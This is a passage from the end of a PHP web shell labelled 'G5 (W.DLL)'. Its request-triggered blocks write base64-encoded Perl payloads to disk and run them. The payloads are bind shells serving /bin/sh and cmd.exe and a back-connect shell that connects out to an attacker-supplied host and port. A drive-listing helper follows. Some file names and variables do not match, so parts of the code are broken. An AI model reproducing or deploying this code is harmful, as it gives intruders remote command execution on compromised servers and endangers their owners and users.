1531{$lbpi="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0oJy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
1532$op=@fopen("lbg.pl","w");
1533@fwrite($op,@base64_decode($lbpi));
1534@fclose($op);
1535if(wdll_chf()) {wdll_cmdf("perl lbg.pl $bo");echo "<br>connected to $bo ";echo "<script type='text/javascript'>alert('connected to $bo')</script>";} else die("<br>I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode $bo");}
1536if($_REQUEST['wbp'])
1537{$wbpi="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmluZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIsIFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVOVCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
1538$op=@fopen("wbg.pl","w");
1539@fwrite($op,@base64_decode($wbp));
1540@fclose($op);
1541if(wdll_chf()) {wdll_cmdf("perl wbg.pl $bo"); echo "<br>connected to $bo";echo "<script type='text/javascript'>alert('connected to $bo')</script>";} else die("<br>I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode $bo");}
1542if($_REQUEST['bpg'] )
1543{$bpgi ="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1ZbMV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlwdC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNoYW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
1544$op =@fopen("bcc.pl","w");
1545@fwrite($op,@base64_decode($bpgi));
1546@fclose($op);
1547if(wdll_chf()) {wdll_cmdf("perl bpg.pl $ip $bo"); echo "<br>connected to $ip $bo";echo "<script type='text/javascript'>alert('connected to $ip $bo')</script>";}else die("<br>I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode ");}}
1548function wdir(){foreach (@range("A","Z") as $dr) {if (@is_dir($dr.":\\")){$drr=$dr.":\\";$ddr=$ddr.'<a href="?dir='.@base64_encode($drr).'"><font size=2>'.$dr.':-- </a></font>';}}echo $ddr;}
1549
1550wdll_bdy();
1551ft();
1552// G5 (W.DLL) v2.0 8/8/2010 - last edit 20/9/2011) Lines after gzip = 1393 size = 86KB Coded by Piaster (wadelamin)
1553//for bug: w.dll@live.com.
1554
1555?>